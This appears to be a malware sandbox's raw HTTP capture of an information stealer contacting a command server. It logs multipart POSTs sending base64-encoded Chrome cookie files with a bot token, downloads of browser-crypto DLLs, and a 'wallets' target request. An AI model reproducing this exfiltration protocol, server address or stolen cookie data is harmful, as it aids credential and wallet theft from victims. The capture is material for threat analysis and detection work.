                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 32 65 61 36 36 30 39 30 34 37 31 61 39 63 33 66 32 33 37 61 35 33 36 34 61 64 61 30 61 63 35 37 39 65 63 61 33 66 65 34 66 37 31 64 34 65 38 34 30 66 38 37 66 34 31 63 38 31 31 38 33 38 33 65 62 63 39 66 32 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: ------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="token"622ea66090471a9c3f237a5364ada0ac579eca3fe4f71d4e840f87f41c8118383ebc9f20------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------DHCAECGIEBKJKEBGDHDA--
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:07.150415897 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:07 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=94
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:07.272614002 CEST557OUTPOST /570d5d5e8678366c.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----EGCBAFCFIJJJECBGIIJK
                                                                                                                                                                                                                                        Host: 85.28.47.70
                                                                                                                                                                                                                                        Content-Length: 359
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 32 65 61 36 36 30 39 30 34 37 31 61 39 63 33 66 32 33 37 61 35 33 36 34 61 64 61 30 61 63 35 37 39 65 63 61 33 66 65 34 66 37 31 64 34 65 38 34 30 66 38 37 66 34 31 63 38 31 31 38 33 38 33 65 62 63 39 66 32 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: ------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="token"622ea66090471a9c3f237a5364ada0ac579eca3fe4f71d4e840f87f41c8118383ebc9f20------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="file"------EGCBAFCFIJJJECBGIIJK--
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:07.459096909 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:07 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=93
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:09.234317064 CEST557OUTPOST /570d5d5e8678366c.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAE
                                                                                                                                                                                                                                        Host: 85.28.47.70
                                                                                                                                                                                                                                        Content-Length: 359
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 32 65 61 36 36 30 39 30 34 37 31 61 39 63 33 66 32 33 37 61 35 33 36 34 61 64 61 30 61 63 35 37 39 65 63 61 33 66 65 34 66 37 31 64 34 65 38 34 30 66 38 37 66 34 31 63 38 31 31 38 33 38 33 65 62 63 39 66 32 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="token"622ea66090471a9c3f237a5364ada0ac579eca3fe4f71d4e840f87f41c8118383ebc9f20------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="file"------EGIDAAFIEHIEHJKFHCAE--
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:09.420877934 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:09 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=92
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:09.926688910 CEST90OUTGET /663cea891445d733/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                        Host: 85.28.47.70
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.225707054 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:10 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                        ETag: "a7550-5e7ebd4425100"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Content-Length: 685392
                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.899509907 CEST90OUTGET /663cea891445d733/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                        Host: 85.28.47.70
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:11.077341080 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:10 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                        ETag: "94750-5e7ebd4425100"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Content-Length: 608080
                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:11.500529051 CEST91OUTGET /663cea891445d733/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                        Host: 85.28.47.70
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:11.677922010 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:11 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                        ETag: "6dde8-5e7ebd4425100"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Content-Length: 450024
                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:12.064707994 CEST87OUTGET /663cea891445d733/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                        Host: 85.28.47.70
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:12.241993904 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:12 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                        ETag: "1f3950-5e7ebd4425100"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Content-Length: 2046288
                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:13.693506002 CEST91OUTGET /663cea891445d733/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                        Host: 85.28.47.70
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:13.872215033 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:13 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                        ETag: "3ef50-5e7ebd4425100"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Content-Length: 257872
                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:14.129095078 CEST95OUTGET /663cea891445d733/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                        Host: 85.28.47.70
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:14.506082058 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:14 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                        ETag: "13bf0-5e7ebd4425100"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Content-Length: 80880
                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:15.424258947 CEST199OUTPOST /570d5d5e8678366c.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----HCFIIIJJKJKFHIDGDBAK
                                                                                                                                                                                                                                        Host: 85.28.47.70
                                                                                                                                                                                                                                        Content-Length: 1067
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:15.759115934 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:15 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=85
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:15.924189091 CEST465OUTPOST /570d5d5e8678366c.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDG
                                                                                                                                                                                                                                        Host: 85.28.47.70
                                                                                                                                                                                                                                        Content-Length: 267
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 32 65 61 36 36 30 39 30 34 37 31 61 39 63 33 66 32 33 37 61 35 33 36 34 61 64 61 30 61 63 35 37 39 65 63 61 33 66 65 34 66 37 31 64 34 65 38 34 30 66 38 37 66 34 31 63 38 31 31 38 33 38 33 65 62 63 39 66 32 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 2d 2d 0d 0a
                                                                                                                                                                                                                                        Data Ascii: ------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="token"622ea66090471a9c3f237a5364ada0ac579eca3fe4f71d4e840f87f41c8118383ebc9f20------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="message"wallets------DAAFBAKECAEGCBFIEGDG--
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:16.103151083 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:16 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                        Content-Length: 2408
                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=84
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
